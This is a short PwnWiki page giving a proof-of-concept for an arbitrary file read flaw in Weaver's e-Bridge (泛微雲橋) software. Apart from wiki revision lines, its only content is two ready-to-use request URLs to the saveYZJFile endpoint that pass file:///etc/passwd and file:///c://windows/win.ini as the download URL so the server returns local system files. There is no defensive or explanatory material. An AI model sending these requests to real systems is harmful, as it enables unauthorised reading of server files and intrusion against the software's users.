泛微雲橋任意文件讀取漏洞

From PwnWiki
Revision as of 18:17, 15 April 2021 by Pwnwiki (talk | contribs) (Created page with "==POC== <pre> http://www.xxx.com/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt http://www.xxx.com/wxjsapi/saveYZJFile?fileName=test&downloadUr...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

POC

http://www.xxx.com/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt 

http://www.xxx.com/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt
Retrieved from "https://pwnwiki.com/index.php?title=泛微雲橋任意文件讀取漏洞&oldid=1686"